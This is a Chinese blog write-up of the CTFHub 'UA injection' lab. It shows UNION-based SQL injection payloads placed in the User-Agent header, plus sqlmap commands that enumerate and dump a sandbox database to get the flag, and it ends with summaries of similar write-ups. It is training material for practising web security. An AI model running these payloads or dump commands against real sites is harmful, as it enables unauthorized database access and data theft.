CTFHub技能树之WEB:UA注入

最新推荐文章于 2024-04-08 21:27:32 发布
最新推荐文章于 2024-04-08 21:27:32 发布
阅读量2k 收藏 6
点赞数 2
分类专栏: CTF SQL注入 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/123622730
版权

小白一个,如有错误请指正!

        UA就是User-Agent的缩写,中文名为用户代理,是Http协议中的一部分,属于头域的组成部分,它是一个特殊字符串头,是一种向访问网站提供你所使用的浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识。通过这个标识,用户所访问的网站可以显示不同的排版从而为用户提供更好的体验或者进行信息统计。

        个人感觉UA注入和Cookie注入是有点像的,都是从请求头中修改参数,payload和普通的union注入是一样的。

解法一: Burpsuite抓包

1.爆数据库

User-Agent: 123 union select 1,database()#

2.爆表名

User-Agent: 123 union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli'

 3.爆字段

User-Agent: 123 union select 1,group_concat(column_name) from information_schema.columns where table_name = 'yfxuvzhgeo'

4.脱裤

User-Agent: 123 union select 1,etojeuvlcc from sqli.yfxuvzhgeo

拿到flag ctfhub{a9709a57175fd1d08eeab4e4} 

解法二: sqlmap

        sqlmap对于我这种小白来说简直是太香啦,怎么会有那么好用的工具,太爱了!

下面附一个超级详细的sqlmap参数介绍:

Sqlmap全参数详解 - 狼人:-) - 博客园sqlmap全参数详解 sqlmap是在sql注入中非常常用的一款工具,由于其开源性,适合从个人到企业,从学习到实战,各领域各阶段的应用,我们还可以将它改造成我们自己独有的渗透利器。这款工具中,大大小https://www.cnblogs.com/waw/p/10828237.html

因为这里是UA注入,所以我们需要把探测等级提升到3   --level 3

1.爆数据库

sqlmap -u http://challenge-470aa9668eb64381.sandbox.ctfhub.com:10800/ --level 3 --dbs

 

2.爆表名

sqlmap -u http://challenge-470aa9668eb64381.sandbox.ctfhub.com:10800/ --level 3 -D sqli --tables


 

3.爆字段

sqlmap -u http://challenge-470aa9668eb64381.sandbox.ctfhub.com:10800/ --level 3 -D sqli -T yfxuvzhgeo --columns

 

4.脱裤

sqlmap -u http://challenge-470aa9668eb64381.sandbox.ctfhub.com:10800/ --level 3 -D sqli -T yfxuvzhgeo -C etojeuvlcc --dump 

 

 

成功拿下flag! 

 

 参考资料

https://www.cnblogs.com/waw/p/10828237.html

weixin_48799157
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
UWC2015:UA Web Challenge 2015 团队任务
06-15
UWC2015 团队任务。 客户 资产 css ( css libs ) js ( gulp app ) 组件( bower i ) 样式( gulp styles ) 服务器??? 来源 应用(角度) 样式(较少)
Web 组态 OPC UA DA协议
02-01
WEB组态平台,OPC UA DA配置说明; 适用人群:适用于从事电气及工业自动化的企业、物联网、企业数字化转型中的企业、中小型的IT服务等企业,通过IGX平台给客户提供数字化产线及MES系统等;同时适用于企业内有自己的IT及电气自动化人员,可通过IGX自行构建数字化产线、数字化看板等物联网系统。 使用场景:WEB SCADA 被用于自来水、污水处理、环保、石油、天然气、电力、能源、钢厂、热力、数字工厂、采矿、楼宇、电信、化工、水电站、风电站、实验检测、设备物联、水库湖泊、农业、汽车、食品、注塑硫化、路灯远控、消防、制冷等行业;
CTFHUB-技能树-Web题-SQL注入-Mysql结构-UA注入
最新发布
Static______的博客
04-08 556
虽然有提示,在此还是按常规进行一下注入点判断吧。利用bp抓包,发送至repeater进行判断。1,2都回显,由此判断可回显字段数为2。得到两个表名,尝试查看第一个表中的数据。UA注入,即User-Agent注入UA注入 需要用到leve 3。注入点在User-Agent。得到列名xwprqxhxjd。由此判断,表中有两个字段。由此判断,此处为注入点。得到数据库名为sqli。
Web安全知识技能书思维导图
07-18
Web安全部分有关于一些知识点的汇总整理,包含一部分入门书籍的推荐
OPCUA读写结构体示例
08-18
OPCUA读写复杂结构体
uap-php:ua-parserPHP实现
08-05
ua-parser PHP 库 这是项目的 PHP 库。 安装 将ua-parser/uap-php添加到composer.json文件的 require 部分并运行composer update 。 用法 直截了当: require_once 'vendor/autoload.php' ; use UAParser \ Parser ; $ ua = "Mozilla/5.0 (Macintosh; Intel Ma..." ; $ parser = Parser :: create (); $ result = $ parser -> parse ( $ ua ); print $ result -> ua -> family ; // Safari print $ result -> ua -> major ; // 6 print
CTFHub-UA注入
m0_51589948的博客
05-19 465
** UA注入** 根据提示寻找User-Agent,对其进行bp抓包,并发包到repeater 对UA进行注入判断 -1 union select 1,2 在注入后回显并显示内容,判断为Cookie注入,按照正常的注入流程获取flag -1 union select database(),1 查库名 然后查询数据库的表名 -1 union select 1,group select(table_name) feom information_schema.table where table
CTFHub | UA注入
尼泊罗河伯的博客
11-23 1879
根据题目显示内容,此题和上一题一致,需要在 UA 请求头中进行 SQL 注入。使用 burp suite 抓包工具抓取题目网站的信息,直接在 UA 请求中使用 payload 进行测试,发现此题存在 UA 注入。那么直接根据注入流程进行注入,最后发现此题 flag 存在于 klsedpegmy 数据中。
ctfhub UA注入
plant1234的博客
06-18 560
UA注入: 首先更具题目知道这道题的题目的 传参点是在User-Agent 所以里bp抓包得到更改User-Agent为1得到: 在利用: 1’ 1’ and 1=1 # 1 and 1=1 1 and 1=2 去测试是否有注入得到: 得到这是有注入的,于是在利用语句: 1 order by 1 1 order by 2 1 order by 3 得到有两个字段 在利用语句: 520 union select 1,2 得出注入点: 这是1,2两个位置都能注入 于是报出库名: 520 u
ctfhub技能树—SQL注入UA注入
Naptmn的博客
02-07 368
不会真的只有我不知道UA指的是user-agent吧 首先先看一下什么是UA 如果大伙写过爬虫应该很熟悉加入的那个header,那个便是UA,在HTTP的请求头中 可以参考这个文章 https://www.jianshu.com/p/c5cf6a1967d1 那么这个题也告诉了,注入点在UA这里,那么我们bp抓包,放入repeater,开始注入!! 1、寻找回显位点 2、数据库名 3、表名 4、列名 5、看里面的数据 得到flag ...
CTFHUB-UA注入
Web学习之路
03-28 146
user-agent
UA EXPERT.rar
06-30
uaexpert全系安装包,window+Linux+app都有,uaexpert-bin-linux-x86_64-v1.5.1-331.tar.gz +uaexpert-bin-win32-x86-vs2008sp1-v1.5.1-331.zip+uaservercpp-win32-x86-vs2010sp1-v1.7.3-505.zip+签名文件
UA-Nodeset:UA节点集
05-15
OPC UA节点集和其他支持文件 内容 在这里找到文件 该存储库包含UANodeSets和其他规范文件,这些文件随规范一起发布。 对规范的任何更改(发行新版本或勘误)都可能需要更改此存储库中的文件。 对于每个规范,需要发布以下规范性文件: .NodeSet2.xml-规范定义的节点的正式定义; .Types.xsd-规范定义的DataType的XML模式; .Types.bsd-规范定义的DataType的OPC二进制模式(已淘汰); .NodeIds.csv-一个CSV文件,其中包含分配给规范定义的节点的NodeId; 此外,可能会发布以下非规范性支持文件: .Classes.cs-与堆栈一起使用的C#类; .DataTypes.cs-与堆栈一起使用的DataType的C#类; .Constants.cs-与堆栈一起使用的C#常量声明; .PredefinedNode
uap-java:ua-parser的Java实现
05-08
ua_parser Java库 这是的Java实现。 该实现使用共享的regex模式并覆盖 。 导入依赖关系: 玛文 <dependency> <groupId>com.github.ua-parser</groupId> <artifactId>uap-java</artifactId> <version>1.5.2</version> </dependency> SBT "com.github.ua-parser" % "uap-java" % "1.5.2" 建造: uap-java依赖于uap-core项目,因此它使用Git子模块表示该依赖关系。 在构建uap-java之前,必须在本地uap-java存储库中检出uap-core项目的副本。 为此,请执行以下命令(从基本uap-java文件夹)以初始化和检出子模块。 git submodule update --
CTFHub-UA注入-wp
z1moq的博客
05-18 264
UA注入 方法一:手注 使用BurpSuite进行截断,并使用Repeater改包 ​ 如图所示,对User-Agent处进行修改,点击Go之后页面出现变化 输入1+1 ,页面返回 id=2 说明存在字符型注入漏洞 使用 1 order by … 测试得字段数为2 如图,开始注入,爆出库名 爆出表名 爆出列名 爆出数据,拿到flag ctfhub{5ba8fd44460a9858b2ba1510} 方法二:sqlmap 使用指令 python sqlmap.py -
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 748
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFHUB-WEB-SQL注入-UA注入
weixin_43486981的博客
08-11 820
注入点在User-Agent。 题目: 靶机环境:直接提示输入点在User-Agent 使用burp suite抓包,注入点在User-Agent 查看显示位 求数据库名 求表名 求列名 求字段值,得到flag
CTFHub技能树web(持续更新)--SQL注入--UA注入
jiuyongpinyin的博客
09-05 457
UA注入 首先根据题目的提示,告诉我们输入点在User-Agent,所以我们抓包进行尝试: 我们发现了返回值不光有user-agent的数据,前面还有查询语句,那么我们输入一个1试一下: 到了这里是不是有点熟悉了,和上一篇cookie注入一样了,那么我就不废话,先通过order by语句查询几列,发现两列的时候回显正常,接着我们使用联合查询: 注入成功了,我们爆破当前数据库: 得到数据库,爆破数据库的表名: 得到了奇怪的表名,查看这个里面的列: 得到列,查询里面的字段: 得到flag 注:萌新
CTFHub - UA注入
Have_a_great_day的博客
09-11 323
其中UA注入则是一种特定的SQL注入形式,它利用了应用程序中使用的UA来进行攻击。table_name='gnihfyuxxz' :选择表名为【gnihfyuxxz】的表的数据。table_schema=database() :选择当前连接的数据库(sqli)中的所有表。可以发现此处没有【flag】表,取而代之的是【gnihfyuxxz】,查看该表中的列名。此题为UA注入,所以我们利用bp进行抓包,找到数据包内的UA进行注入。【news】表一直都存在,所以第一想法先不考虑此表中的内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值